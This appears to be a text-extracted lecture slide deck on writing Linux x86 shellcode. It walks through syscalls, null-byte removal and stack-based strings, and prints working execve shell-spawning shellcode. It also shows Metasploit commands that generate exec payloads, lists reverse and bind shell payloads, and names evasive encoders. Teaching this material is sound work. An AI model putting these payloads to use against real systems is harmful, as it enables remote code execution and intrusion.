Shellcode

Content

Intel Architecture

Memory Layout Buffer Overflow

C Arrays
BoF Exploit

Assembler
Remote Exploit

Shellcode
Exploit Mitigations
Function Calls

Debugging Defeat Exploit Mitigations

Slide 2
Shellcode?
Shellcode! Example in one slide

Slide 4
Slide 5
Shellcode

Shellcode is:

The code we want to upload to the remote system

Our “evil code”

“A set of instructions injected and executed by exploited

software”

Slide 6
Shellcode

“Arbitrary Code Execution”

Upload our own code!

Execute a “Shell” (like bash)

Also called “payload”

Slide 7
Shellcode

Server Software
Evil Exploit
Evil

Slide 8
Shellcode

What should a shellcode do?

 Execute a shell (bash)
 Add admin user
 Download and execute more code
 Connect back to attacker

Slide 9
Shellcode

How does a shellcode work?

 Assembler instructions
 Native code which performs a certain action (like starting a shell)

Slide 10
Shellcode

Shellcode Properties
 Should be small
 Because we maybe have small buffers in the vulnerable
program
 Position Independent
 Don’t know where it will be loaded in the vulnerable program
 No Null Characters (0x00)
 Strcpy etc. will stop copying after Null bytes
 Self-Contained
 Don’t reference anything outside of shellcode

Slide 11
Shellcode

Recap:

Shellcode is:
 A string of bytes
 Which can be executed independantly

Slide 12
Syscalls
Syscalls

Note: Next slides are in x32 (not x64)

Slide 14
Syscalls

Syscalls?
 Ask the kernel to do something for us

Why syscalls?
 Makes it easy to create shellcode
 Direct interface to the kernel

Alternative:
 Call LIBC code; write()
 Problem: Don’t know where write() is located!

Slide 15
Syscalls

Lets try to write a shellcode with the write() syscall

To print a message:
“Hi there”

Code:
write(1, “Hi there”, 8);

Slide 16
Syscalls

syscalls(2):
The system call is the fundamental interface
between an application and the Linux kernel.

System calls are generally not invoked directly,

but rather via wrapper functions in glibc […]

For example, glibc contains a function truncate()

which invokes the underlying "truncate" system
call.

Slide 17
Syscalls Examples

Process Control
• load
• execute
• end, abort
• create process (for example, fork)
• terminate process
• get/set process attributes
• wait for time, wait event, signal event
• allocate, free memory

File management
• create file, delete file
• open, close
• read, write, reposition
• get/set file attributes

Slide 18
Syscalls Example

Example system calls:

 Accept
 Alarm
 Bind
 Brk
 Chmod
 Chown
 Clock_gettime
 Dup
 Exit
 Getcwd
 Kill
 Link
 Lseek
 Open
 poll

Slide 19
Syscalls

How to call a syscall:

mov eax <system_call_number>
int 0x80

Arguments in:
1. EBX
2. ECX
3. EDX
4. …

Slide 20
Syscalls

write (
int fd,
char *msg,
unsigned int len);

write (
1,
&msg,
strlen(msg));
Slide 21
Syscalls

What are file descriptors?

0: Stdin
1: Stdout
2: Stderr

And also, >2:

Files
Sockets (Network)

Slide 22
Syscalls

Systemcall calling convention:

EAX: Write() syscall nr: 0x04
EBX: FD (file descriptor), stdout = 0x01
ECX: address of string to write
EDX: Length of string

int 0x80: Execute syscall

Slide 23
Syscalls: Assembler print

write (
int fd,
char *msg,
unsigned int len);

mov eax, 4 // write()

mov ebx, 1 // int fd
mov ecx, msg // char *msg
mov edx, 9 // unsigned int len
int 0x80 // invoke syscall

Slide 24
Syscalls: Assembler print
$ cat print.asm
section .data
msg db 'Hi there',0xa

section .text
global _start
_start:

; write (int fd, char *msg, unsigned int len);

mov eax, 4
mov ebx, 1
mov ecx, msg
mov edx, 9
int 0x80

; exit (int ret)

mov eax, 1
mov ebx, 0
int 0x80
Slide 25
Syscalls: Assembler print
$ cat print.asm
section .data
msg db 'Hi there',0xa Data
section .text
global _start Text
_start:

; write (int fd, char *msg, unsigned int len);

mov eax, 4
mov ebx, 1
mov ecx, msg
mov edx, 9
int 0x80

; exit (int ret)

mov eax, 1
mov ebx, 0
int 0x80
Slide 26
Syscalls

Recap:
 Syscalls are little functions provided by the kernel
 Can be called by putting syscall number in eax, and issuing int 80
 Arguments are in registers (ebx, ecx, edx)

Slide 27
How is shellcode formed?

Short description of shellcode

How is shellcode formed?
$ cat print.asm
section .data
msg db 'Hi there',0xa

section .text
global _start
_start:

; write (int fd, char *msg, unsigned int len);

mov eax, 4
mov ebx, 1
mov ecx, msg
mov edx, 9
int 0x80

; exit (int ret)

mov eax, 1
mov ebx, 0
int 0x80
Slide 29
How is shellcode formed?

Compile it:
$ nasm -f elf print.asm

Link it:
$ ld –m elf_i386 -o print print.o

Execute it:
$ ./print
Hi there
$

Slide 30
How is shellcode formed?

$ objdump -d print
08048080 <_start>:
// print
8048080: b8 04 00 00 00 mov $0x4,%eax
8048085: bb 01 00 00 00 mov $0x1,%ebx
804808a: b9 a4 90 04 08 mov $0x80490a4,%ecx
804808f: ba 09 00 00 00 mov $0x9,%edx
8048094: cd 80 int $0x80

// exit()
8048096: b8 01 00 00 00 mov $0x1,%eax
804809b: bb 00 00 00 00 mov $0x0,%ebx
80480a0: cd 80 int $0x80

Slide 31
How is shellcode formed?

$ objdump -d print
08048080 <_start>:
// print
8048080: b8 04 00 00 00 mov $0x4,%eax
8048085: bb 01 00 00 00 mov $0x1,%ebx
804808a: b9 a4 90 04 08 mov $0x80490a4,%ecx
804808f: ba 09 00 00 00 mov $0x9,%edx
8048094: cd 80 int $0x80

// exit()
8048096: b8 01 00 00 00 mov $0x1,%eax
804809b: bb 00 00 00 00 mov $0x0,%ebx
80480a0: cd 80 int $0x80

Slide 32
How is shellcode formed?

$ hexdump –C print
00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
00000010 02 00 03 00 01 00 00 00 80 80 04 08 34 00 00 00 |............4...|
00000020 94 01 00 00 00 00 00 00 34 00 20 00 02 00 28 00 |........4. ...(.|
00000030 06 00 03 00 01 00 00 00 00 00 00 00 00 80 04 08 |................|
00000040 00 80 04 08 a2 00 00 00 a2 00 00 00 05 00 00 00 |................|
00000050 00 10 00 00 01 00 00 00 a4 00 00 00 a4 90 04 08 |................|
00000060 a4 90 04 08 09 00 00 00 09 00 00 00 06 00 00 00 |................|
00000070 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000080 b8 04 00 00 00 bb 01 00 00 00 b9 a4 90 04 08 ba |................|
00000090 09 00 00 00 cd 80 b8 01 00 00 00 bb 00 00 00 00 |................|
000000a0 cd 80 00 00 48 69 20 74 68 65 72 65 0a 00 2e 73 |....Hi there...s|
000000b0 79 6d 74 61 62 00 2e 73 74 72 74 61 62 00 2e 73 |ymtab..s…

Slide 33
How is shellcode formed?

Compile/Assembler:
 The process of converting source code into a series of instructions/bytes
 Assembler -> Bytes

Disassemble:
 The process of converting a series of instructions/bytes into the equivalent assembler
source code
 Bytes -> Assembler

Decompile:
 The process of converting instructions/assembler into the original source code
 Assembler -> C/C++

Slide 34
How is shellcode formed?

Stack
0x80490a4

“Hi there”
Data 48 69 20 74 68 65 72 65

8048080: b8 04 00 00 00 mov $0x4,%eax

8048085: bb 01 00 00 00 mov $0x1,%ebx
Code 804808a:
804808f:
b9
ba
a4
09
90
00
04
00
08
00
mov
mov
$0x80490a4,%ecx
$0x9,%edx
8048094: cd 80 int $0x80

Slide 35
How is shellcode formed?

Problems with the shellcode:

 Null bytes
 References data section / Not position independent

Slide 36
How is shellcode formed?

Recap:
 Compiled assembler code produces bytes
 These bytes can be executed

 To have a functioning shellcode, some problems need to be fixed

 0 bytes
 Data reference

Slide 37
Shellcode Fix: Null Bytes
Shellcode Fix: Null Bytes

Why are null bytes a problem?

 It’s a string delimiter
 Strcpy() etc. will stop copying if it encounters a 0 byte

Slide 39
Shellcode Fix: Null Bytes

How to fix null bytes in shellcode?

 Replace instructions with contain 0 bytes
 Note: This is more an art than a technique.

Slide 40
Shellcode Fix: Null Bytes

// print
8048080: b8 04 00 00 00 mov $0x4,%eax
8048085: bb 01 00 00 00 mov $0x1,%ebx
804808a: b9 a4 90 04 08 mov $0x80490a4,%ecx
804808f: ba 09 00 00 00 mov $0x9,%edx
8048094: cd 80 int $0x80

// exit()
8048096: b8 01 00 00 00 mov $0x1,%eax
804809b: bb 00 00 00 00 mov $0x0,%ebx
80480a0: cd 80 int $0x80

Slide 41
Shellcode Fix: Null Bytes

How do we remove the null bytes?

 Replace instructions which have 0 bytes with equivalent instructions
which do not have these

Examples
 Has 0 bytes:
mov $0x04, %eax
 Equivalent instructions (without 0 bytes):
xor %eax, %eax
mov $0x04, %al

Slide 42
Shellcode Fix: Null Bytes
// print
8048060: 31 c0 xor %eax,%eax
8048062: 31 db xor %ebx,%ebx
8048064: 31 c9 xor %ecx,%ecx
8048066: 31 d2 xor %edx,%edx

8048068: b0 04 mov $0x4,%al

804806a: b3 01 mov $0x1,%bl
804806c: b2 08 mov $0x8,%dl

// exit()
804807c: b0 01 mov $0x1,%al
804807e: 31 db xor %ebx,%ebx
8048080: cd 80 int $0x80

Slide 43
Shellcode Fix: Null Bytes

Recap:
 Need to remove \x00 bytes
 By exchanging instructions with equivalent instructions

Slide 44
Shellcode Fix: Stack Reference
Shellcode Fix: Stack Reference

Problem:
 The current shellcode references a string from the data section
 In an exploit we can only execute code
 not (yet) modify data!

Solution:
 Remove dependency on the data section
 By storing the same data directly in the code
 And move it to the stack

Slide 46
Shellcode Fix: Stack Reference

$ objdump -d print
08048080 <_start>:
// print
8048080: b8 04 00 00 00 mov $0x4,%eax
8048085: bb 01 00 00 00 mov $0x1,%ebx
804808a: b9 a4 90 04 08 mov $0x80490a4,%ecx
804808f: ba 09 00 00 00 mov $0x9,%edx
8048094: cd 80 int $0x80

// exit()
8048096: b8 01 00 00 00 mov $0x1,%eax
804809b: bb 00 00 00 00 mov $0x0,%ebx
80480a0: cd 80 int $0x80

Slide 47
Shellcode Fix: Stack Reference

How does it look like in memory?

 We have a string in the data section
 We have code in the text section

 The code references the data section

Slide 48
Syscalls: Memory Layout

Stack
0x80490a4

“Hi there”
Data 48 69 20 74 68 65 72 65

8048080: b8 04 00 00 00 mov $0x4,%eax

8048085: bb 01 00 00 00 mov $0x1,%ebx
Code 804808a:
804808f:
b9
ba
a4
09
90
00
04
00
08
00
mov
mov
$0x80490a4,%ecx
$0x9,%edx
8048094: cd 80 int $0x80

Slide 49
Shellcode Fix: Stack Reference

What do we want?
 Have the data in the code section!

How do we reference the data?

 Push the data onto the stack
 Reference the data on the stack (for the system call)

Slide 50
Syscalls: Memory Layout

ESP Stack “Hi there”

48 69 20 74 68 65 72 65

Data

8048080: b8 04 00 00 00 mov $0x4,%eax

8048085: bb 01 00 00 00 mov $0x1,%ebx
Code 804808a:
804808f:
b9
ba
a4
09
90
00
04
00
08
00
mov
mov
%esp,%ecx
$0x9,%edx
8048094: cd 80 int $0x80

Slide 51
Shellcode Fix: Stack Reference

Translate to ASCII:
; H i _ t h e r e
; 48 69 20 74 68 65 72 65

Invert for little endianness:

; 74 20 69 48 65 72 65 68

Slide 52
Shellcode Fix: Stack Reference

; H i _ t h e r e
; 48 69 20 74 68 65 72 65
; 74 20 69 48 65 72 65 68

push 0x65726568
push 0x74206948
mov ecx, esp
int 0x80

Slide 53
Shellcode Fix: Stack Reference

<Stuff>
ESP
push 0x65726568
push 0x74206948
mov ecx, esp
int 0x80

Slide 54
Shellcode Fix: Stack Reference

<Stuff>
ESP
0x65726568 push 0x65726568
push 0x74206948
mov ecx, esp
int 0x80

Slide 55
Shellcode Fix: Stack Reference

<Stuff>
ESP
0x65726568 push 0x65726568
0x74206948 push 0x74206948
mov ecx, esp
int 0x80

Slide 56
Shellcode Fix: Stack Reference

<Stuff>
ESP
0x65726568 push 0x65726568
0x74206948 push 0x74206948
mov ecx, esp
ECX int 0x80

Slide 57
Shellcode Fix: Stack Reference

0x74206948 0x65726568 <Stuff>

48 69 20 74 68 65 72 65 <Stuff>

H i _ t h e r e <Stuff>

2864434397 Number in Decimal (10)

0xAABBCCDD Number in Hex (16)
DD CC BB AA Little Endian Storage
Slide 58
Shellcode Fix: Stack Reference
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 31 db xor %ebx,%ebx
8048064: 31 c9 xor %ecx,%ecx
8048066: 31 d2 xor %edx,%edx

8048068: b0 04 mov $0x4,%al

804806a: b3 01 mov $0x1,%bl
804806c: b2 08 mov $0x8,%dl
804806e: 68 68 65 72 65 push $0x65726568
8048073: 68 48 69 20 74 push $0x74206948
8048078: 89 e1 mov %esp,%ecx
804807a: cd 80 int $0x80

804807c: b0 01 mov $0x1,%al

804807e: 31 db xor %ebx,%ebx
8048080: cd 80 int $0x80
Slide 59
Shellcode Fix: Stack Reference

Recap:
 External data reference needs to be removed
 Put the data into code
 And from the code into the stack

Slide 60
Fixed Shellcode
Shellcode Problems

Now we have:
 No null bytes!
 No external dependencies!

Slide 62
Memory Layout (Old, with data reference)

Stack
0x80490a4

“Hi there”
Data 48 69 20 74 68 65 72 65

8048080: b8 04 00 00 00 mov $0x4,%eax

8048085: bb 01 00 00 00 mov $0x1,%ebx
Code 804808a:
804808f:
b9
ba
a4
09
90
00
04
00
08
00
mov
mov
$0x80490a4,%ecx
$0x9,%edx
8048094: cd 80 int $0x80

Slide 63
Memory Layout (New, stack reference)

Stack
“Hi there”
48 69 20 74 68 65 72 65

Data

804806e: 68 68 65 72 65 push $0x65726568

8048073: 68 48 69 20 74 push $0x74206948
8048078: 89 e1 mov %esp,%ecx
Code

Slide 64
Convert shellcode

Convert the output of the objdump –d to C-like string:

objdump -d print2
| grep "^ "
| cut -d$'\t' -f 2
| tr '\n' ' '
| sed -e 's/ *$//'
| sed -e 's/ \+/\\x/g'
| awk '{print "\\x"$0}'

Wow, my command-line fu is off the charts!

Result:
\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\
xb2\x08\x68\x68\x65\x72\x65\x68\x48\x69\x20\x74\x
89\xe1\xcd\x80\xb0\x01\x31\xdb\xcd\x80
Slide 65
Execute shellcode

$ cat shellcodetest.c
#include <stdio.h>
#include <string.h>

char *shellcode = "\x31\xc0\x31\xdb[…]";

int main(void) {
( *( void(*)() ) shellcode)();
}

$ gcc shellcodetest.c -o shellcodetest

$ ./shellcodetest
Hi there
$

Slide 66
Memory Layout (New New)

804806e: 68 68 65 72 65 push $0x65726568

Stack 8048073:
8048078:
68 48 69 20 74
89 e1
push
mov
$0x74206948
%esp,%ecx

“Hi there”
48 69 20 74 68 65 72 65
Data

Code
Slide 67
Execute Stuff

Want to execute something else than printing “Hi there!”

Slide 68
Execute Stuff

Syscall 11: execve()

int execve(
const char *filename,
char *const argv[],
char *const envp[]);

e.g.:
execve(“/bin/bash”, NULL, NULL);

Slide 69
Shell Execute Shellcode

Shell Execute Shellcode:

08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 2f 2f 73 68 push $0x68732f2f
8048068: 68 2f 62 69 6e push $0x6e69622f
804806d: 89 e3 mov %esp,%ebx
804806f: 89 c1 mov %eax,%ecx
8048071: 89 c2 mov %eax,%edx
8048073: b0 0b mov $0xb,%al
8048075: cd 80 int $0x80
8048077: 31 c0 xor %eax,%eax
8048079: 40 inc %eax
804807a: cd 80 int $0x80

Slide 70
Shellcode! Example in one slide

Slide 71
32 vs 64 bit
32bit vs 64bit

Syscalls in 64 bit are nearly identical to 32 bit

How to execute them:

32 bit: int 80
64 bit: syscall

Where are the arguments:

32 bit: ebx, ecx, edx, …
64 bit: rdi, rsi, rdx

Slide 73
32bit vs 64bit

Syscalls:

Slide 74
Types of shells by shellcode
Types of shellcode

Types of shell’s provided by shellcode:

Local shell (privilege escalation)

Remote shell
 Reverse
 Bind
 Find

Slide 76
Shellcode

Bind shell:

Port 8080
Server Software
Shellcode Exploit
Port 31337

Slide 77
Shellcode

Reverse shell:

Port 8080
Server Software
Shellcode Exploit
Port 31337

Slide 78
Shellcode

Find shell:

Port 8080
Server Software
Shellcode Exploit

Slide 79
Types of shellcode

Types of shellcode:

Self contained (all in one)

Staged
 Minimal initial shellcode: Stager
 Stager loads stage 1
 Stage 1 loads Stage 2

Slide 80
Types of shell / shellcode

Shellcode can be categorized by what type of shell it provides

 Depends on the target
 Depends on the exploit
 Depends on your preference
 Usually:
 just listen for packets
 connect-back
 re-use existing connection

Slide 81
Metasploit

Generate Shellcode with Metasploit

Metasploit

Who wants to code shellcode?

There is an app for that…

Metasploit payloads:
 Intel, ARM, MIPS, …
 Windows, Linux, FreeBSD, …
 32/64 bit
 Listen-, connect-back-, execute, add-user, …
 Alphanumeric, sticky-bit, anti-IDS, …

Slide 83
Metasploit Shellcode: Payload List

Payloads:
$ msfconsole
msf > use payload/linux/x64/[TAB]
use payload/linux/x64/exec
use payload/linux/x64/shell/bind_tcp
use payload/linux/x64/shell/reverse_tcp
use payload/linux/x64/shell_bind_tcp
use payload/linux/x64/shell_bind_tcp_random_port
use payload/linux/x64/shell_find_port
use payload/linux/x64/shell_reverse_tcp

Slide 84
Metasploit Shellcode: Payload Create

Let metasploit create an exec() shellcode:

msf > use payload/linux/x64/exec
msf payload(exec) > set cmd = "/bin/bash"
cmd => = /bin/bash
msf payload(exec) > generate
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00" +
"\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8" +
"\x0c\x00\x00\x00\x3d\x20\x2f\x62\x69\x6e\x2f\x62\x61\x73" +
"\x68\x00\x56\x57\x48\x89\xe6\x0f\x05"

Slide 85
Metasploit Shellcode: Payload Create

And now without null bytes:

msf payload(exec) > generate -b '\x00\x0A'
"\x48\x31\xc9\x48\x81\xe9\xf9\xff\xff\xff\x48\x8d\x05\xef" +
"\xff\xff\xff\x48\xbb\xca\x7f\x48\xd1\xcf\x89\xea\x19\x48" +
"\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xa0\x44\x10" +
"\x48\x87\x32\xc5\x7b\xa3\x11\x67\xa2\xa7\x89\xb9\x51\x43" +
"\x98\x20\xfc\xac\x89\xea\x51\x43\x99\x1a\x39\xc3\x89\xea" +
"\x19\xf7\x5f\x67\xb3\xa6\xe7\xc5\x7b\xab\x0c\x20\xd1\x99" +
"\xde\xa2\x90\x2c\x70\x4d\xd1\xcf\x89\xea\x19"

Slide 86
Metasploit Shellcode: Payload Encoder

Shellcode encoders:
msf payload(exec) > show encoders
[…]
x86/add_sub manual Add/Sub Encoder
x86/add_sub
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/alpha_mixed
x86/avoid_underscore_tolower manual Avoid underscore/tolower
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/alpha_upper
x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/avoid_underscore_tolower
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder

x86/avoid_utf8_tolower
x86/context_stat
x86/context_time
manual
manual
stat(2)-based Context Keyed Payload Encoder
time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/opt_sub manual Sub Encoder (optimised)
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

Slide 87
Metasploit Shellcode: Payload Encoder

Alphanumeric Shellcode

Slide 88
Metasploit Shellcode

No more exploits with hardcoded shellcode:

Slide 89
Metasploit Shellcode

Recap:
 Metasploit can generate shellcode
 Pretty much any form of shellcode
 With many useful payloads

Slide 90
References:

References:

Modern vulnerability exploiting: Shellcode

 https://drive.google.com/file/d/0B7qRLuwvXbWXT1htVUVpdjRZUmc/edit

Slide 91
Defense: Detect Shellcode
Detect Shellcode

How to detect shellcode usage:

 Find NOP’s (lots of 0x90)
 Find stager
 Find stage1 / stage2

NIDS: Network based Intrusion Detection System

HIDS: Host based Intrusion Detection System

Slide 93